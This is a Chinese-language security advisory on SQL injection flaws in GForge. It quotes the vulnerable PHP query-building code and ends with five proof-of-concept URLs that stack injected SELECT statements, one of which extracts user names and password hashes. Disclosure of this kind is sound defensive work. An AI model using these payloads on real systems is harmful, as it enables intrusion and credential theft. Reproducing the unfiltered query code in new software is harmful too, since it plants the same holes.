BUGTRAQ ID: 31674
CVE(CAN) ID: CVE-2008-6187,CVE-2008-6188,CVE-2008-6189
GForge是用于管理软件开发周期的工具。
GForge的new/index.php、news/index.php和top/topusers.php文件没有正确地过滤offset输入参数:
function db_query($qstring,$limit=‘-1’,$offset=0) {
global $QUERY_COUNT;
$QUERY_COUNT++;
if ($limit > 0) {
if (!$offset || $offset < 0) {
$offset=0;
}
$qstring=$qstring." LIMIT $limit OFFSET $offset";
}
if ($GLOBALS['IS_DEBUG'])
$GLOBALS['G_DEBUGQUERY'] .= $qstring . "<p><br />\n";
global $conn;
return @pg_exec($conn,$qstring);
}
people/editprofile.php文件没有正确的过滤skill_edit[]输入参数:
$SQL = "select * from skills_data where skills_data_id
in(".$skill_ids[0];
for($i = 1; $i < $numSkills; $i++) {
$SQL .= ", ".$skill_ids[$i];
}
$SQL .= ")";
$result=db_query($SQL);
frs/shownotes.php文件没有正确过滤release_id输入参数:
$result=db_query("SELECT frs_release.notes,frs_release.changes,
frs_release.preformatted,frs_release.name,frs_package.group_id,frs_package.is_public
FROM frs_release,frs_package
WHERE frs_release.package_id=frs_package.package_id
$pub_sql
AND frs_release.release_id=‘$release_id’");
远程攻击者可以通过提交恶意的SQL查询请求执行SQL注入攻击。
GForge GForge 4.6 b1
GForge GForge 4.5.19
厂商补丁:
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
<a href=“http://gforge.org/” target=“_blank”>http://gforge.org/</a>
http://www.example.com/new/?group_id=&amp;limit=50&amp;offset=50;select 1 as id,CURRENT_USER as forum_id, version() as summary
http://www.example.com/news/?group_id=&amp;limit=50&amp;offset=50;select+1+as+id,unix_pw+as+forum_id,+user_name||unix_pw+as+summary+from+users
http://www.example.com/top/topusers.php?offset=0;select+1,version()+as+user_name,3,4,5;
http://www.example.com/frs/shownotes.php?release_id=*/+--+454&amp;pub_sql=;select+1+as+is_public,1337+as+group_id,current_user+as+name,4+as+notes,version()+as+changes,6;/*
http://www.example.com/people/editprofile.php?skill_edit[]=1);select+1,2,3,version()+as+title,5,6;+--+&amp;MultiEdit=Edit